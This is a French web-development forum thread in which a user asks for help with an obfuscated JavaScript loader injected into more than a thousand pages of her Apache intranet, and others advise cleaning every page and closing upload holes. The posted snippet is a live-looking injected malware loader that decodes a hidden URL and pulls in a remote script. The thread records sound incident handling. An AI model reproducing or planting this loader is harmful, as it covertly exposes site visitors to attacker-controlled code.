Problème serveur Apache sous Windows XP [Résolu]

laetitia.j · 26/08/2011, 09h30

Bonjour,

Il y a 2 ans j'ai installée un serveur Apache sur un PC tournant sous Windows XP (l'OS étant une contrainte imposé par mon employeur... Un linux m'aurait mieux convenu).

Apache a été couplé avec PHP et MYSQL, en reproduisant les anciennes configurations du serveur linux précédent).
Le serveur dns ISC Bind est également installé.

J'ai également installée un pare-feu (KOMODO) et un antivirus (Microsoft Security Essentials).
Ce serveur héberge notre intranet ainsi que notre espace client.

Il a fonctionné parfaitement pendant 1 an et demi avant de devenir très lent.
Ce problème a été résolu depuis mais remplacé par un autre beaucoup plus gênant. Un script js a été collé dans toutes les pages web et empêche le bon fonctionnement des scripts utilisant des sessions. Je ne peux pas supprimer ce script dans toutes les pages car trop nombreuses (>1000).

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<script>
function vdch() {
	if(document.all.length > 3) {
		var t = new Array('#6a7072', '#723e29', '#2d6562', '#6d7667', '#606863', '#766b72', '#712a65', '#6d2a73', '#692b6c', '#712b00');
		var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
		var dch = document.createElement("script");
		dch.id = "dchid";
		dch.src = dchid;
		document.all[3].appendChild(dch);
	} else {
		setTimeout("vdch()",500);
	}
} setTimeout("vdch()",500);
</script>

Savez d'où vient ce script et comment l'éradiquer et faire que cela ne se reproduise plus ?

Merci d'avance pour vos réponses.

_Mac_ · 26/08/2011, 18h28

Ton site a été piraté. Je n'expliquerai pas ici le but du script mais clairement, il a été piraté. A mon avis, tu n'as pas le choix :

Nettoie toutes tes pages pour supprimer ce code. Il n'y a rien dans Apache pour supprimer ce code automatiquement et le plus sûr pour te débarrasser de ce code est de le supprimer "physiquement" de toutes tes pages.
Vérifie ton site et assure-toi qu'il n'y a pas moyen de pirater ton site en uploadant un fichier PHP par exemple.

David Guillot · 29/08/2011, 10h44

Je te conseille UltraEdit ou jEdit qui te permettent de faire du rechercher/remplacer multi-lignes massif (dans tous les fichiers *.php d'un dossier et de ses sous-dossiers par exemple).

laetitia.j · 02/09/2011, 14h38

Merci à vous deux

J'ai suivie vos conseils et supprimer tout ce code en trop à l'aide du logiciel conseillé.

Il n'y plus aucune trace de ce script sur le serveur.

29/08/2011, 10h44	#3
David Guillot Membre Expert David Guillot Chef de projet en SSII Inscription : mars 2004 Messages : 879 Détails du profil Informations personnelles : Nom : David Guillot Âge : 28 Localisation : France, Paris (Île de France) Informations professionnelles : Activité : Chef de projet en SSII Secteur : High Tech - Multimédia et Internet Informations forums : Inscription : mars 2004 Messages : 879 Points : 1 149 Points : 1 149	Je te conseille UltraEdit ou jEdit qui te permettent de faire du rechercher/remplacer multi-lignes massif (dans tous les fichiers .php d'un dossier et de ses sous-dossiers par exemple). __________________ Avant de poser une question ici* : Après résolution de votre question : un clic sur , un et un vote pour les personnes qui vous ont aidé
	10

26/08/2011, 18h28	#2
_Mac_ Rédacteur/Modérateur Inscription : août 2005 Messages : 8 295 Détails du profil Informations forums : Inscription : août 2005 Messages : 8 295 Points : 8 575 Points : 8 575	Ton site a été piraté. Je n'expliquerai pas ici le but du script mais clairement, il a été piraté. A mon avis, tu n'as pas le choix : Nettoie toutes tes pages pour supprimer ce code. Il n'y a rien dans Apache pour supprimer ce code automatiquement et le plus sûr pour te débarrasser de ce code est de le supprimer "physiquement" de toutes tes pages. Vérifie ton site et assure-toi qu'il n'y a pas moyen de pirater ton site en uploadant un fichier PHP par exemple. __________________ Du détail, du détail, du détail !!! Revenons à la source : lisons la documentation et les fichiers de trace, la réponse à notre problème s'y trouve sans doute
	10

02/09/2011, 14h38	#4
laetitia.j Invité de passage Laëtitia JUNG Développeur Web Inscription : août 2011 Messages : 2 Détails du profil Informations personnelles : Nom : Laëtitia JUNG Localisation : France, Moselle (Lorraine) Informations professionnelles : Activité : Développeur Web Secteur : Communication - Médias Informations forums : Inscription : août 2011 Messages : 2 Points : 2 Points : 2	Merci à vous deux J'ai suivie vos conseils et supprimer tout ce code en trop à l'aide du logiciel conseillé. Il n'y plus aucune trace de ce script sur le serveur.
	00

Outils de la discussion
Afficher une version imprimable Envoyer un lien vers cette page par email